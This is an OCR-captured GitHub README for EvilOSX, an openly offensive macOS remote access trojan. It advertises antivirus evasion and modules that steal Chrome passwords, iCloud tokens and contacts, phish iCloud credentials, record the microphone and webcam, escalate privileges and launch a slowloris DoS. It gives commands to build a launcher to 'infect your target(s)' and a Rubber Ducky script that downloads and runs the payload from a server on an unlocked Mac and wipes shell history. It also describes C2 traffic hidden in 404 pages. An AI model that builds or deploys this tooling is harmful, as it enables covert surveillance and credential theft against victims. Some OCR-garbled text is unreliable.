1/5 Marten4n6 EvilOSX github.com/Marten4n6/EvilOSX An evil RAT (Remote Administration Tool) for macOS / OS X. license GPLv3 python 2.7, 3.7 issues 44 open build error contributions welcome Marco Generator by Cedric Owens This project is no longer active Features Emulate a terminal instance Simple extendable module system No bot dependencies (pure python) Undetected by anti-virus (OpenSSL AES-256 encrypted payloads) Persistent GUI and CLI support Retrieve Chrome passwords Retrieve iCloud tokens and contacts Retrieve/monitor the clipboard Retrieve browser history (Chrome and Safari) Phish for iCloud passwords via iTunes https://github.com/Marten4n6/EvilOSX https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt https://github.com/Marten4n6/EvilOSX/issues https://travis-ci.org/Marten4n6/EvilOSX https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md https://github.com/cedowens/EvilOSX_MacroGenerator https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md https://en.wikipedia.org/wiki/Advanced_Encryption_Standard https://i.imgur.com/x3ilHQi.png 2/5 iTunes (iOS) backup enumeration Record the microphone Take a desktop screenshot or picture using the webcam Attempt to get root via local privilege escalation How To Use Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time. Advanced users There's also a CLI for those who want to use this over SSH: Screenshots # Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Go into the repository $ cd EvilOSX # Install dependencies required by the server $ sudo pip install -r requirements.txt # Start the GUI $ python start.py # Lastly, run a built launcher on your target(s) # Create a launcher to infect your target(s) $ python start.py --builder # Start the CLI $ python start.py --cli --port 1337 # Lastly, run a built launcher on your target(s) 3/5 https://camo.githubusercontent.com/3c4db3213ff5f65b5932e83c7c4682fd46f3c166bf858c79836a5949f0e9b8b9/68747470733a2f2f692e696d6775722e636f6d2f44475943514d6c2e706e67 https://camo.githubusercontent.com/12ee5a92289cf66bd9bedd876e1e1c530d0f6907353b928c3b3af0a606341174/68747470733a2f2f692e696d6775722e636f6d2f7177336b347a342e706e67 [I] Server started, waiting for connections... [I] Tupe “help” to show the help menu. Show this help menu. Show the amount of available bots. Start interacting with the bot (required before using “use"), Show a list of available modules, use Run the module on the connected bot, stop Ask the module to stop executing. setall <¢module_name> Set the module which will be run on every bot. stopall Clear the globally set module. clear Clear the screen, exit/g/quit Close the server and exit. [I] No page specified, showing the first page. [I] Use “bots " to see a different page feach page is 18 results). = “bot@botnet” (Clast seen: Fri, Jul 26 @ 12:45:36) [I] Connected to “bot@botnet", ready to send commands. [I] Tupe “use " to use a module. CVE-2815-5889 - Attempt to get root via CYE-2815-5669 (18.9.5 to 18.18.5), get_backups - Show @ list of devices backed up by iTunes. get_infoa - Return basic information about the bot. icloud_contacts - Retrieve iCloud contacts, update_bot - Update the bot to the latest Clocal) version. chrome _passwords Retrieve Chrome passwords. decrupt_mme Retrieve iCloud and MMe authorization tokens. phish_i tunes Phish the bot for their iCloud password via iTunes. microphone Record the microphone. webcam Take a picture using the bot's webcam. slowloris Perform a slowloris DoS attack. upload Upload a file to the bot. screenshot Take a screenshot of the bot's screen, down] oad Download a file or directory from the bot. remove_bot Remove EvilOSX from the bot. clipboard Retrieve or moniter the bot's clipboard. browser_history Retrieve browser history (Chrome and Safari] #GitHub/Evil Home Control Broadcast Builder UID Username Version Execute Responses Command type: Module Module name: microphone Time in seconds to record (Leave empty for 5): Remote output directory (Leave empty for /tmp): Remote output name (Leave empty for ): Last Seen 4/5 Motivation This project was created to be used with my Rubber Ducky, here's the simple script: It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for. Versioning EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. Server and bot releases will be numbered with the follow format: And constructed with the following guidelines: Breaking backward compatibility (with older bots) bumps the major New additions without breaking backward compatibility bumps the minor Bug fixes and misc changes bump the patch For more information on SemVer, please visit https://semver.org/. Design Notes REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX REM See also: https://ducktoolkit.com/vidpid/ DELAY 1000 GUI SPACE DELAY 500 STRING Termina DELAY 1000 ENTER DELAY 1500 REM Kill all terminals after x seconds STRING screen -dm bash -c 'sleep 6; killall Terminal' ENTER STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER .. https://camo.githubusercontent.com/12ee5a92289cf66bd9bedd876e1e1c530d0f6907353b928c3b3af0a606341174/68747470733a2f2f692e696d6775722e636f6d2f7177336b347a342e706e67 https://hakshop.com/products/usb-rubber-ducky-deluxe https://ducktoolkit.com/vidpid/ https://semver.org/ 5/5 Infecting a machine is split up into three parts: A launcher is run on the target machine whose only goal is to run the stager The stager asks the server for a loader which handles how a payload will be loaded The loader is given a uniquely encrypted payload and then sent back to the stager The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight") Command requests are retrieved from the server via a GET request Command responses are sent to the server via a POST request Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline Issues Feel free to submit any issues or feature requests here. Contributing For a simple guide on how to create modules click here. Credits The awesome Empire project Shoutout to Patrick Wardle for his awesome talks, check out Objective-See manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts (now deleted... let me know if you reappear) The slowloris module is pretty much copied from PySlowLoris urwid and this code which saved me a lot of time with the CLI Logo created by motusora License GPLv3 https://www.zlib.net/ https://github.com/Marten4n6/EvilOSX/issues https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md https://github.com/EmpireProject https://twitter.com/patrickwardle https://objective-see.com/ https://github.com/ProjectMayhem/PySlowLoris http://urwid.org/ https://github.com/izderadicka/xmpp-tester/blob/master/commander.py https://www.behance.net/motusora https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt